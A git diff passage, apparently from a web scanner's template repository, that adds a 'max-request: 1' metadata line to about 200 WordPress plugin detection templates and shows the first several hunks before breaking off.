 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
